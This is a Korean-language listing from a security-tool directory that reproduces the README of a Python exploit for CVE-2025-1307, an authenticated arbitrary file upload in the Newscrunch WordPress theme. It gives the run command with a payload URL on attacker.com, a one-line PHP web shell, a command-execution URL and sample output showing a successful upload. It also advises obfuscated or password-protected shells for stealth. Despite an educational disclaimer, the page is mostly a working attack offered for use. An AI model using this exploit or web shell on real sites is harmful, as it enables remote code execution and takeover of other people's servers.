Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-1307 — Newscrunch <= 1.8.4 - 인증된 (구독자+) 임의 파일 업로드 | Kitploit
도구/GitHubGitHub/nxploited/cve-2025-1307
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubnxploited/cve-2025-1307

CVE-2025-1307

Newscrunch <= 1.8.4 - 인증된 (구독자+) 임의 파일 업로드

저장소 보기
211년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Newscrunch 익스플로잇 (CVE-2025-1307)

🚨 개요

이 익스플로잇은 Newscrunch WordPress 테마의 치명적인 취약점(CVE-2025-1307)을 대상으로 합니다. 이 결함은 newscrunch_install_and_activate_plugin() 함수의 기능 검사 누락으로 인해 **인증된 사용자(구독자 이상)**가 임의의 파일을 업로드할 수 있게 합니다. 이로 인해 **원격 코드 실행(RCE)**으로 이어져 영향을 받는 WordPress 사이트가 완전히 손상될 수 있습니다.


🔥 취약점 세부 정보

  • CVE ID: CVE-2025-1307
  • 영향받는 소프트웨어: Newscrunch WordPress 테마 (<= 1.8.4.1)
  • CWE 분류: CWE-862 - 누락된 권한 부여
  • CVSS 점수: 9.8 (치명적)
  • 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 게시 날짜: 2025년 3월 4일

🛑 심각도 및 영향

  • ✅ 원격 코드 실행(RCE)
  • ✅ 전체 시스템 손상
  • ✅ 무단 파일 업로드
  • ✅ 권한 상승 위험

악용 가능성: 을 가진 유효한 WordPress 계정이 필요합니다.

구독자 이상의 권한

📜 스크립트 기능

✅ CVE-2025-1307 자동 악용
✅ 취약한 테마 버전 자동 감지
✅ ZIP 페이로드 자동 추출 및 실행
✅ ZIP에서 셸 파일 이름을 동적으로 검색
✅ 악용 후 셸 사용 가능 여부 자동 확인
✅ 디버깅을 위한 깔끔하고 구조화된 로깅


🚀 사용 방법

📌 사전 요구 사항

Python 3.x가 설치되어 있는지 확인하고 필요한 종속성을 설치하세요:

root@kitploit:~
pip install requests urllib3 packaging

🔧 익스플로잇 실행

root@kitploit:~
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"

🔹 사용법

root@kitploit:~
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        Malicious file URL to upload

🛠️ 업로드된 셸 사용

셸이 성공적으로 업로드되면 대상 시스템에서 원격 명령 실행이 가능합니다. 셸 파일은 ZIP 아카이브 안에 넣어야 하며, 악용 시 자동으로 추출됩니다.

🔹 ZIP 페이로드 만들기

PHP 셸(shell.php)이 ZIP 아카이브 안에 있는지 확인하세요. 그런 다음 익스플로잇을 사용하여 ZIP 파일을 업로드하세요.

root@kitploit:~
<?php system($_GET['cmd']); ?>

🔹 명령 실행

브라우저에서 셸 URL에 cmd 매개변수를 추가하여 시스템 명령을 실행할 수 있습니다:

root@kitploit:~
http://target/wp-content/plugins/shell.php?cmd=whoami

⚠️ 셸 보안 유지

  • 이는 단순한 웹 셸이므로 인증 기능이 없으며 신중하게 사용해야 합니다.
  • 발견되면 관리자가 쉽게 제거할 수 있습니다.
  • 은밀한 작업을 위해 난독화된 PHP 코드 또는 비밀번호로 보호된 셸을 사용하는 것을 고려하세요.

🔹 예상 출력

root@kitploit:~
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls

⚠️ 면책 조항

이 도구는 교육 및 보안 연구 목적으로만 제공됩니다. 취약점을 무단으로 악용하는 것은 불법이며 법적 처벌을 받을 수 있습니다. 저자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 책임감 있게 사용하세요.

제작: Nxploit | Khaled Alenazi

도구 다운로드